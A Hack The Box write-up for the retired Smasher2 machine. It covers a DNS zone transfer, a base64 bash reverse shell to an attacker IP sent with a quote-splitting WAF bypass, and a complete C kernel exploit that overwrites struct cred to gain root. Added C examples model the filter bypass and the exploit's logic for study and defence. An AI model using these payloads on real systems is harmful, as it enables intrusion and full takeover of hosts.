  • HTB box: Smasher2

    This article is for technical exchange, study and research only. Using the techniques in it for illegal purposes or to cause damage is strictly forbidden; the author bears no responsibility for any consequences.

    The box is a retired machine, accessed with a VIP subscription; its IP address is 10.10.10.135.

    This time I use https://github.com/Tib3rius/AutoRecon for an automated all-round scan.

    Run: autorecon 10.10.10.135 -o ./Smasher2-autorecon

    A DNS service is running, so try a zone transfer; an authoritative server that answers AXFR for any client hands out its whole zone:

    dig -t axfr smasher2.htb @10.10.10.135

    Several hostnames come back; bind them in /etc/hosts:

    10.10.10.135 wonderfulsessionmanager.smasher2.htb smasher2.htb root.smasher2.htb

    Brute-force directories:

    The backup directory turns up, holding sensitive files.

    Download the two files first and keep them; browsing to the hostnames bound above shows a login page.

    I got stuck here for a long time; this box is genuinely hard. In the end, following a writeup online, I analysed the downloaded files and arrived at the following. For the detailed analysis see: https://0xdf.gitlab.io/2019/12/14/htb-smasher2.html

    That gives the request key for the API endpoint, through which commands can be executed. While testing I found a WAF blocking the usual commands, so I used a WAF-bypassing command directly to get a reverse shell.

    WAF evasion techniques:
    https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0
    
    echo '/bin/bash -i >& /dev/tcp/10.10.14.3/8833 0>&1' | base64
    L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMvODgzMyAwPiYxCg==
    
    Original command:
    echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMvODgzMyAwPiYxCg== | base64 -d | bash
    
    WAF-bypassing command (the request body sent to the API; the inserted quotes split every keyword so a pattern match on the raw body fails, while bash removes the quotes before executing and runs the original command):
    {"schedule":
    "ec''ho 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMvODgzMyAwPiYxCg=='|'b'a''s''e'6'4 -'d'|b'a''s'h"}

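To show why the quote-split payload gets past a keyword filter and what a filter has to do instead, here is an added C example (not code from the original post or from the box): it implements the shell's quote removal, runs a naive substring blacklist over the raw payload, then runs the same blacklist over the command the shell would actually execute. The payload string is the one from the request above; the blocked-word list and the normalizing filter are assumptions for the demonstration, not a description of the WAF on the box.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* The obfuscated payload from the request above, and the command bash runs
   after quote removal (constructed from the writeup's values). */
static const char OBFUSCATED_CMD[] =
    "ec''ho 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMvODgzMyAwPiYxCg=='"
    "|'b'a''s''e'6'4 -'d'|b'a''s'h";
static const char PLAIN_CMD[] =
    "echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMvODgzMyAwPiYxCg=="
    "|base64 -d|bash";

/* Keywords an assumed naive command-injection filter refuses. */
static const char *BLOCKED[] = { "echo", "base64", "bash", NULL };

/* POSIX shell quote removal: '...' contents are literal, "..." contents are
   literal apart from backslash before $ ` " \ or newline, an unquoted
   backslash escapes the next character, and the quote characters vanish.
   Parameter expansion, $'...' and command substitution are not modelled.
   `out` must hold at least strlen(in) + 1 bytes. Returns the output length. */
size_t shell_unquote(const char *in, char *out) {
    char q = 0;               /* currently open quote character, or 0 */
    size_t n = 0;
    for (; *in; in++) {
        if (q == '\'') {
            if (*in == '\'') q = 0; else out[n++] = *in;
        } else if (q == '"') {
            if (*in == '"') q = 0;
            else if (*in == '\\' && in[1] && strchr("$`\"\\\n", in[1])) out[n++] = *++in;
            else out[n++] = *in;
        } else if (*in == '\'' || *in == '"') {
            q = *in;
        } else if (*in == '\\' && in[1]) {
            out[n++] = *++in;
        } else {
            out[n++] = *in;
        }
    }
    out[n] = '\0';
    return n;
}

/* Substring blacklist on the raw request body: this is what the quote-split
   payload defeats, because no blocked word appears contiguously. */
bool naive_waf_blocks(const char *cmd) {
    for (int i = 0; BLOCKED[i]; i++)
        if (strstr(cmd, BLOCKED[i])) return true;
    return false;
}

/* Same blacklist, applied to what the shell would execute. */
bool normalizing_waf_blocks(const char *cmd) {
    char buf[4096];
    if (strlen(cmd) >= sizeof buf) return true;   /* fail closed on oversize input */
    shell_unquote(cmd, buf);
    return naive_waf_blocks(buf);
}

int main(void) {
    char buf[4096];
    shell_unquote(OBFUSCATED_CMD, buf);
    printf("shell sees : %s\n", buf);
    printf("naive WAF  : %s\n", naive_waf_blocks(OBFUSCATED_CMD) ? "blocked" : "allowed");
    printf("normalizing: %s\n", normalizing_waf_blocks(OBFUSCATED_CMD) ? "blocked" : "allowed");
    return 0;
}
```

The normalizing check is still only a blacklist; its point here is that any filter matching on shell syntax has to see the string the way the shell will, and the same goes for `e\cho`, `$'...'` and variable tricks that this small function deliberately leaves out.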
    For a stable, convenient connection to the target, generate a key pair locally, add the public key on the box and connect with the private key.

    Now the root privilege escalation. Here you have to write the exploit yourself; for the analysis and the exploit development see: https://0xdf.gitlab.io/2019/12/14/htb-smasher2.html#priv-dzonerzy--root

    #include <stdio.h>
    #include <fcntl.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/mman.h>

    /* Map a large range of /dev/dhid at a fixed address, scan the mapping for this
       process's struct cred (eight consecutive 32-bit ids equal to our uid), then
       set the ids to 0 and the capability sets to all ones and spawn a shell. */
    int main(int argc, char * const *argv)
    {
        printf("[+] PID: %d\n", getpid());
        int fd = open("/dev/dhid", O_RDWR);
        if (fd < 0)
        {
            printf("[-] Open failed!\n");
            return -1;
        }

        printf("[+] Open OK fd: %d\n", fd);

        unsigned long size = 0xf0000000;
        unsigned long mmapStart = 0x42424000;
        unsigned int *addr = (unsigned int *)mmap((void *)mmapStart, size,
                                                  PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0x0);

        if (addr == MAP_FAILED)
        {
            perror("Failed to mmap: ");
            close(fd);
            return -1;
        }

        printf("[+] mmap OK addr: %p\n", (void *)addr);
        unsigned int uid = getuid();
        printf("[+] UID: %d\n", uid);

        unsigned int credIt = 0;
        unsigned int credNum = 0;
        /* Walk the mapping one 32-bit word at a time, stopping 0x40 bytes short
           of the end so the comparisons and writes below stay inside it. */
        while (((unsigned long)addr) < (mmapStart + size - 0x40))
        {
            credIt = 0;
            /* uid, gid, suid, sgid, euid, egid, fsuid, fsgid: all equal to our uid */
            if (addr[credIt++] == uid && addr[credIt++] == uid && addr[credIt++] == uid && addr[credIt++] == uid &&
                addr[credIt++] == uid && addr[credIt++] == uid && addr[credIt++] == uid && addr[credIt++] == uid)
            {
                credNum++;
                printf("[+] Found cred structure! ptr: %p, credNum: %d\n", (void *)addr, credNum);
                /* Zero all eight ids: if this really is our cred, we are root now. */
                for (credIt = 0; credIt < 8; credIt++)
                    addr[credIt] = 0;
                if (getuid() == 0)
                {
                    puts("[+] GOT ROOT!");
                    credIt += 1; /* skip the 4-byte securebits field to reach the capability sets */
                    /* cap_inheritable, cap_permitted, cap_effective, cap_bset, cap_ambient:
                       five kernel_cap_t of two 32-bit words each, all set to 0xffffffff */
                    for (int i = 0; i < 10; i++)
                        addr[credIt++] = 0xffffffff;
                    execl("/bin/sh", "-", (char *)NULL);
                    puts("[-] Execl failed...");
                    break;
                }
                else
                {
                    /* False positive (some other run of our uid): put the values back. */
                    for (credIt = 0; credIt < 8; credIt++)
                        addr[credIt] = uid;
                }
            }
            addr++;
        }
        puts("[+] Scanning loop END");
        fflush(stdout);
        (void)getchar();
        return 0;
    }

    After compiling on the local Kali machine (build with -static if the target's libc differs from yours), copy the exploit to the target with scp and run it to get root.
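The scan-and-patch logic of the exploit above, as an added example (not the original post's or 0xdf's code) that runs offline: it replays the same search (eight consecutive 32-bit words equal to our uid, which assumes uid == gid as it is for the box's user) and the same write sequence over a constructed buffer standing in for the mapped physical memory. The buffer deliberately contains a decoy run of uids before the real cred, which shows why the exploit checks getuid() after zeroing and restores the ids on a false positive. The field order (eight ids, securebits, then five two-word capability sets) is what the exploit assumes for struct cred on that kernel generation; the word offsets, the buffer contents and the model_is_root stand-in for getuid() are assumptions of this example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Word layout the exploit relies on (struct cred on 4.x kernels, x86_64):
   eight 32-bit ids, one 32-bit securebits word, then five kernel_cap_t of
   two u32 each. Names follow include/linux/cred.h; this is a model for the
   demonstration, not the kernel's definition. */
#define CRED_ID_WORDS   8
#define CRED_CAP_START  9      /* first word after securebits */
#define CRED_CAP_WORDS  10     /* 5 capability sets x 2 u32 */

/* Constructed stand-in for the mmap'd physical memory: a decoy run of uids
   (e.g. an array of gids in an unrelated allocation) followed by a real cred. */
#define MEM_WORDS 64
#define DECOY_OFF 10
#define CRED_OFF  30

static uint32_t mem[MEM_WORDS];

/* Stand-in for getuid(): reports the euid (5th id) of the genuine cred. */
static bool model_is_root(void) { return mem[CRED_OFF + 4] == 0; }

void build_memory(uint32_t uid) {
    for (size_t i = 0; i < MEM_WORDS; i++) mem[i] = 0xdeadbe00u + (uint32_t)i;
    for (int k = 0; k < CRED_ID_WORDS; k++) mem[DECOY_OFF + k] = uid;   /* decoy */
    for (int k = 0; k < CRED_ID_WORDS; k++) mem[CRED_OFF + k] = uid;    /* cred ids */
    mem[CRED_OFF + CRED_ID_WORDS] = 0;                                  /* securebits */
    for (int k = 0; k < CRED_CAP_WORDS; k++) mem[CRED_OFF + CRED_CAP_START + k] = 0;
}

/* The test the exploit's while-loop performs at every word: eight consecutive
   words equal to our uid. Returns the word index of the next hit, or -1. */
long next_candidate(const uint32_t *words, size_t n, size_t from, uint32_t uid) {
    for (size_t i = from; i + CRED_ID_WORDS <= n; i++) {
        int k = 0;
        while (k < CRED_ID_WORDS && words[i + k] == uid) k++;
        if (k == CRED_ID_WORDS) return (long)i;
    }
    return -1;
}

/* Replays the exploit's write sequence on each candidate with the same
   false-positive handling: zero the ids, ask whether we are root now, and if
   not restore the ids and keep scanning. Returns the index of the patched
   cred, or -1 if none was found. */
long find_and_patch(uint32_t *words, size_t n, uint32_t uid, bool (*is_root)(void)) {
    size_t from = 0;
    long idx;
    while ((idx = next_candidate(words, n, from, uid)) >= 0) {
        uint32_t *c = words + idx;
        for (int k = 0; k < CRED_ID_WORDS; k++) c[k] = 0;            /* all ids -> 0 (root) */
        if (is_root()) {
            /* skip securebits; cap_inheritable..cap_ambient = all ones */
            for (int k = 0; k < CRED_CAP_WORDS; k++) c[CRED_CAP_START + k] = 0xffffffffu;
            return idx;
        }
        for (int k = 0; k < CRED_ID_WORDS; k++) c[k] = uid;          /* not our cred: restore */
        from = (size_t)idx + 1;
    }
    return -1;
}

int main(void) {
    build_memory(1000);
    long hit = find_and_patch(mem, MEM_WORDS, 1000, model_is_root);
    printf("patched cred at word %ld; decoy at %d restored: %s\n", hit, DECOY_OFF,
           mem[DECOY_OFF] == 1000 ? "yes" : "no");
    return hit == CRED_OFF ? 0 : 1;
}
```

Against the real device the only differences are that the buffer is the mmap'd range and is_root is getuid(); the restore step matters because any eight adjacent copies of your uid in physical memory (a gid array, a stale cred of an exited process) match the signature, and zeroing them without checking could corrupt something that is not your cred.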

  • Original article: https://www.cnblogs.com/autopwn/p/14261304.html